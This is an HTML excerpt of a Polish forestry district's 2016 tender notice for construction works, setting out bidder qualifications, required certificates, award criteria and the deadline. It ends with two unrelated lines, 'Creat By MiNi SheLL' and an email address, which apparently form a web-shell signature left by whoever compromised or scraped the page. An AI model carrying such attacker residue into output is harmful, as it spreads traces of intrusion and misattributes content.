<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia, Wykonawca zobowiązany jest wykazać i udokumentować, iż należycie  wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, co najmniej dwa  zadania  w zakresie modernizacji, przebudowy lub budowy  o wartości co najmniej 400 000,00 zł netto każda z nich, potwierdzonych dokumentami stwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach o których mowa w rozdz. 7</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym, Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej po jednej osobie, które posiadają uprawnienia / kwalifikacje zawodowe / do kierowania robotami pozwalające na wykonywanie samodzielnych funkcji technicznych w budownictwie w branży konstrukcyjno-budowlanej, sanitarnej i elektrycznej. Zamawiający dopuszcza połączenie funkcji kierownika budowy i kierownika robót pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji. Osoba wyznaczona do kierowania robotami musi posiadać wymagane uprawnienia do sprawowania samodzielnych funkcji w budownictwie dla kierownika budowy bez ograniczeń oraz posiadać doświadczenie min. 5 lat w kierowaniu robotami w swojej branży. Kierownik robót oprócz wymaganych kwalifikacji winien posiadać doświadczenie zawodowe minimum 3 letnie. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach o których mowa w rozdz. 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący sytuacji ekonomicznej i finansowej jest spełniony, jeżeli wykonawca wykaże że:
1/ posiada środki finansowe lub zdolność kredytową na kwotę łączną nie mniejszą niż 400 000,00 zł
2/ jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 400 000,00 zł., tj. kwotę odszkodowania jaką gwarantuje ubezpieczyciel. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach o których mowa w rozdz. 7</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w trakcie realizacji przedmiotu umowy przewiduje następujące zmiany treści umowy wprowadzane aneksem:
zmiana terminu wykonania zamówienia: 
a) spowodowana niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi wykonanie robót w niżej wymienionych okolicznościach:
- klęski żywiołowe,
- wysoki stan wód powierzchniowych spowodowany opadami atmosferycznymi,
- utrzymujące się niskie temperatury i pokrywa śnieżna,
- rozmiękczenie gruntu uniemożliwiające poruszanie się sprzętu,
- wystąpienie innych zagrożeń uszkodzenia dróg dojazdowych w wyniku transportu towarów i materiałów,
b)spowodowana warunkami geologicznymi, archeologicznymi lub terenowymi  w niżej wymienionych okolicznościach:
- niewypały i niewybuchy,
- wykopaliska archeologiczne
c)Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego:
- wstrzymanie robót przez Zamawiającego na jego wyraźne żądanie
konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej.
d) konieczność udzielenia zamówienia dodatkowego w rozumieniu przepisów PZP.
Warunki dokonania zmiany: 
w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. a, b, c, d  termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_lomza/zamówienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Łomża ul. Nowogrodzka 60  18-400 Łomża pok. nr 3 / parter /.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2016 godzina 10:00, miejsce: Oferty należy składać w siedzibie zamawiającego w Łomży ul. Nowogrodzka 60   w sekretariacie / I piętro /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com